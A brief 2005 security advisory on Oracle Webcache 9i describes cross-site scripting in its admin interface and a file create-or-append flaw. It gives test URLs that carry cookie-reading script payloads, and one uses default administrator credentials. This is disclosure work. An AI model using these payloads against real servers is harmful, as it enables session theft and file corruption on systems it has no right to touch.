Services
Information
Company |
Append file in Oracle Webcache 9i
Details Many parameters are vulnerable against XSS/CSS attacks. Together with this bug it is possible to corrupt an Oracle Application Server installation. Patch Information Oracle fixed this issue with informing me or their customers. Testcase http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1& cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script> http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit& PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2 http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump& ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script> History 23-sep-2003 Oracle was secalert informed 23-sep-2003 Bug confirmed 26-apr-2005 Red-Database-Security published this advisory 11-may-2005 CAN added © 2005 by Red-Database-Security GmbH - last update 03-nov-2005 |
Oracle Webcache |